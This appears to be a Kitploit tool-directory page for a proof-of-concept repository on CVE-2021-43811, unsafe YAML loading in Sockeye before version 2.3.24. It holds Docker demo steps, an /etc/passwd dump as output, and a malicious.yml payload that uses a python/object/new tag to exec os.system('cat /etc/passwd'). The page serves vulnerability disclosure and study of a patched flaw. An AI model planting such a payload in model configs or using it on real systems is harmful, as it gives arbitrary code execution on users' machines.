Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-43811 — awslabs/sockeye Code injection via unsafe YAML loading CVE-2021-43811 | Kitploit
Tools/GitHubGitHub/s-index/cve-2021-43811
Payload GenerationVulnerability AnalysisCode AnalysisExploitationPapers & ResearchLearning & Education
GitHubs-index/cve-2021-43811

CVE-2021-43811

awslabs/sockeye Code injection via unsafe YAML loading CVE-2021-43811

View Repository
22494 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-43811

awslabs/sockeye Code injection via unsafe YAML loading CVE-2021-43811

NVD Description

Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. The issue is fixed in version 2.3.24.

Demo

cve-2021-43811

Set Up

  1. Build an image from a Dockerfile
root@kitploit:~
docker build -t cve-2021-43811 .
  1. Run python main.py in a new container
root@kitploit:~
docker run -it --rm cve-2021-43811

output /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

PoC Payload

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

Reference

  • https://github.com/awslabs/sockeye/security/advisories/GHSA-ggmr-44cv-24pm
Download Tool